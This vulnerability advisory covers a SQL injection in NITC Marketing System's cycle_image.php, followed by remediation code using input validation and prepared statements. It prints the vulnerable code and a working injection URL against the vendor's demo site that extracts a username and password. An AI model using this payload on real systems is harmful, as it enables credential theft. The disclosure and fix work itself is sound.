SQL injection vulnerability in NITC Marketing System
The injection is in cycle_image.php:

<?php
define("IN_LOCK", true);
define("INIT_NO_USERS", true);
define("INIT_NO_SMARTY", true);
require("./includes/init.php");
header("Content-type: text/xml; charset=UTF-8");
header("Expires: Fri, 14 Mar 1980 20:53:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Pragma: no-cache");

// Split the language parameter on "^" to get an array: [page id, category]
$s = explode("^", trim($_GET['language']));
echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?><Bcaster>";
// $s[0] is concatenated into the query without quotes, so magic_quotes_gpc does not
// stop injection here (the first column name is reconstructed from garbled text)
$SQL = "select * from " . $site->table("ad") . " where page_id=" . $s[0]
     . " and category='" . $s[1] . "' and type=0 and state=0 order by sort_order desc";
$res = $db->getAllCached($SQL);
foreach ($res as $row) {
    if (is_file("upload/adfile/" . $row['file'])) {
        echo "<item item_url=\"" . $_CFG['weburl'] . "/upload/adfile/" . $row['file']
           . "\" link=\"" . $row['url'] . "\"/>";
    }
}
echo "</Bcaster>";
?>
Test against the vendor's demo site:
http://demo.cnnitc.com/cycle_image.php?language=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(floor(rand(0)*2),(select%20concat(user_name,0x23,password)%20from%20nitc_user%20limit%200,1)x%20FROM%20INFORMATION_SCHEMA.tables%20GROUP%20BY%20x)a)#
Solution:
The language parameter is split into an array, so cast each value before it reaches the query:
$language = intval($_GET['language']);
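A fuller hardening of the same handler, added here as an example and not NITC's own code. Casting the whole raw string with intval() keeps only the leading digits, so the category half of "id^category" is lost; the version below casts each element after explode(), rejects anything that is not a plain integer or a short token, and binds both values through a prepared statement so no request data is ever concatenated into the SQL text. It assumes a PDO connection in $pdo, a table named nitc_ad and the $_CFG['weburl'] setting from the original; the helper names are hypothetical.

```php
<?php
// Added example: hardened replacement for the query in cycle_image.php.
// Assumptions: $pdo is an open PDO connection, the ad table is "nitc_ad",
// $_CFG['weburl'] is defined by the application's init code.

function parseLanguageParam(string $raw): ?array {
    // Expected shape: "<page_id>^<category>", e.g. "1^top" (constructed sample)
    $parts = explode("^", trim($raw), 2);
    if (count($parts) !== 2) {
        return null;
    }
    // page_id must be a plain decimal integer; anything else is rejected outright
    // instead of relying on intval() silently truncating it.
    if (!ctype_digit($parts[0])) {
        return null;
    }
    // category: restrict to a short identifier-style token rather than trusting quoting
    if (!preg_match('/^[A-Za-z0-9_\-]{1,32}$/', $parts[1])) {
        return null;
    }
    return ['page_id' => (int)$parts[0], 'category' => $parts[1]];
}

function fetchAds(PDO $pdo, int $pageId, string $category): array {
    // Prepared statement: user input travels as bound parameters, never in the SQL text
    $stmt = $pdo->prepare(
        "SELECT file, url FROM nitc_ad
          WHERE page_id = :page_id AND category = :category
            AND type = 0 AND state = 0
          ORDER BY sort_order DESC"
    );
    $stmt->bindValue(':page_id', $pageId, PDO::PARAM_INT);
    $stmt->bindValue(':category', $category, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function xmlAttr(string $value): string {
    // Escape attribute values so stored data cannot break the XML document either
    return htmlspecialchars($value, ENT_QUOTES | ENT_XML1, 'UTF-8');
}

header("Content-type: text/xml; charset=UTF-8");
$params = parseLanguageParam($_GET['language'] ?? '');
if ($params === null) {
    // Malformed input gets an empty document and a 400, not a query
    http_response_code(400);
    echo '<?xml version="1.0" encoding="UTF-8"?><Bcaster/>';
    exit;
}

echo '<?xml version="1.0" encoding="UTF-8"?><Bcaster>';
foreach (fetchAds($pdo, $params['page_id'], $params['category']) as $row) {
    // basename() keeps the file lookup inside upload/adfile/ even if the stored name is odd
    $file = basename($row['file']);
    if (is_file("upload/adfile/" . $file)) {
        echo '<item item_url="' . xmlAttr($_CFG['weburl'] . '/upload/adfile/' . $file)
           . '" link="' . xmlAttr($row['url']) . '"/>';
    }
}
echo '</Bcaster>';
```

With this shape the payload in the test URL above is rejected by parseLanguageParam() before any database call, and even a value that passed validation could only ever reach MySQL as a bound integer or string, which is the property a per-element intval() alone does not give for the quoted category field.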